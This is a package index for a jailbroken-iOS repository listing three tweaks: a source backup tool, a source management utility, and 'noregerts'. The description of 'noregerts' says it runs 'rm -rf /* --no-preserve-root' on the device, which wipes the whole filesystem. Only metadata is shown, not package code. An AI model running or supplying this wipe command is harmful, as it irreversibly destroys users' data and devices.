Package: xyz.skylarmccauley.noregerts
Version: 1.0.1
Architecture: iphoneos-arm
Maintainer: TheHacker
Filename: ./debs/xyz.skylarmccauley.noregerts.deb
Size: 1696
MD5sum: 345522aeba4dab7044c8031f6fb899bf
SHA1: f617f39898b68ce09c08c433160bdde7fc1fa915
SHA256: dd7c41e354436033de02283f54238b9b060eb757aaff4338c22446369a1b71f7
Section: Utilities
Homepage: https://skylarmccauley.xyz/
Description: Run noregerts in terminal to rm -rf /* --no-preserve-root your iOS Device.
Author: TheHacker
Depiction: http://skylarmccauley.xyz/hacked-repo/depictions/?p=xyz.skylarmccauley.noregerts
Name: noregerts

Package: xyz.skylarmccauley.sourcebackup
Version: 0.1
Architecture: iphoneos-arm
Maintainer: TheHacker
Depends: firmware (>= 9.0)
Filename: ./debs/xyz.skylarmccauley.sourcebackup.deb
Size: 1788
MD5sum: 3c02cd2d95a2d1d54f3cd5e9980633a4
SHA1: c6affcf98db37133ff22940b23ce23e2fbb0a632
SHA256: 0bb0dbaef8a8ab7c2837117d148e1c2d302e627226119773497f01c78e990e16
Section: Utilities
Homepage: https://skylarmccauley.xyz/
Description: Backup your Cydia and Sileo resources to a zip file. Requires root permissions.
Author: TheHacker
Depiction: http://skylarmccauley.xyz/hacked-repo/depictions/?p=xyz.skylarmccauley.sourcebackup
Name: sourcebackup

Package: xyz.skylarmccauley.sourceutility
Version: 0.2-2
Architecture: iphoneos-arm
Maintainer: TheHacker
Depends: firmware (>= 9.0), findutils
Conflicts: xyz.skylarmccauley.sourcebackup
Filename: ./debs/xyz.skylarmccauley.sourceutility.deb
Size: 3108
MD5sum: c91ff72f95bd25f5af03b33bb6a6af0a
SHA1: 4cbf77e969a8e2f710ddfa9320324a1f836dad87
SHA256: c11d5808bdd6c9e9f82274ae05626073a143a2d9bb2b99f1cd362ad416268ad5
Section: Utilities
Homepage: https://skylarmccauley.xyz/
Description: The all-in-one utility for managing your already added Cydia and Sileo sources.
Author: TheHacker
Depiction: http://skylarmccauley.xyz/hacked-repo/depictions/?p=xyz.skylarmccauley.sourceutility
Name: sourceutility

